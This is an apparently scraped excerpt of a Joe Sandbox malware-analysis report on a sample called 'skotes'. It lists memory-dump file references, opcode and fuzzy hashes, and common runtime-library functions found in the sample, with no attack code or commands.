Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: cc37943117baa7e37393a6dddb4fd97e2a7189c980d0e1734f5182af479d03ff
Instruction ID: f0eb223d7508535a376e2631861f5ff077bc6851d1230eeddb001839d69cd793
Opcode Fuzzy Hash: cc37943117baa7e37393a6dddb4fd97e2a7189c980d0e1734f5182af479d03ff
Instruction Fuzzy Hash: 35411B75A00204DFCF05EF64C895BADB7B5FF89310F1481A9DD459B382DB38A941CBA1

Function 007A44DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 007A4538
ListArray.LIBCONCRT ref: 007A456C
Hash.LIBCMT ref: 007A45D5
Hash.LIBCMT ref: 007A45E5

Part of subcall function 007A9C41: std::bad_exception::bad_exception.LIBCMT ref: 007A9C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 007A474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007A47A4

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: aaa5b2cad927fe5fd309a7e30b321b707fd4001827c48c64a26c5f47b5fdd5c6
Instruction ID: 14206cc6e31e783885e9dec30a44bf79140244cdaf7a28e76a295021bc0540b8
Opcode Fuzzy Hash: aaa5b2cad927fe5fd309a7e30b321b707fd4001827c48c64a26c5f47b5fdd5c6
Instruction Fuzzy Hash: D08153B0A11B52FAD708DF748849BD9FAA8BF46710F10431AF52897281DBB96560CBD1

Function 0079ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0079ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0079ED17

Part of subcall function 0079F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0079F3FA

__alloca_probe_16.LIBCMT ref: 0079ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0079ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0079EDC6
__freea.LIBCMT ref: 0079EDEC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: e5aedeb3f7c7327285c97a9ad15948e1f4b73bd472c9971b832ee3f7103e8d8f
Instruction ID: 0886e1d7762c845cd543e62b19f2a131fa20ef8abe4bc7785c486924ed3db2a3
Opcode Fuzzy Hash: e5aedeb3f7c7327285c97a9ad15948e1f4b73bd472c9971b832ee3f7103e8d8f
Instruction Fuzzy Hash: 88317AB1B00215CBCF15DFA8E9456AEB7B5EF09310B64406EE845E7351DB38AE02CBA5

Function 007C67A9 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 007C6902
__alloca_probe_16.LIBCMT ref: 007C6998
__freea.LIBCMT ref: 007C6A03
__freea.LIBCMT ref: 007C6A0F

Strings

=L-t, xrefs: 007C67B1

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: =L-t
API String ID: 1635606685-768041998
Opcode ID: eea9bfef5938362d0eea88b12ab905dde7cce3a25bef382cb529da690246e054
Instruction ID: fa406436f8ae9d97cb45bf17b2e89717406878492d8f919ce84aed75d53d5f45
Opcode Fuzzy Hash: eea9bfef5938362d0eea88b12ab905dde7cce3a25bef382cb529da690246e054
Instruction Fuzzy Hash: 71819F72D00255ABDF20AE6488C5FEE7BF9AF49714F19815DE805B7281E73DDC408BA1

Function 007B1B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 007B1B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B1B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B1C2A

Strings

pContext, xrefs: 007B1C22
switchState, xrefs: 007B1B5E

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: ba379d9ab34a1fdb8e25a2273c208d70e8c679f683714f655710a59afe1b070b
Instruction ID: 4c137fe10d566d4b734c2deede97e704a544766f0fdcc51e99dec3f703f6b642
Opcode Fuzzy Hash: ba379d9ab34a1fdb8e25a2273c208d70e8c679f683714f655710a59afe1b070b
Instruction Fuzzy Hash: 2631A675A00214DBCF05EF64C8A5BEE7775FF44310FA04565E91197341EB78EE11CA90

Function 007B4E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 007B4E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 007B4E86
PMDtoOffset.LIBCMT ref: 007B4EAC

Strings

Bad dynamic_cast!, xrefs: 007B4EEE

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

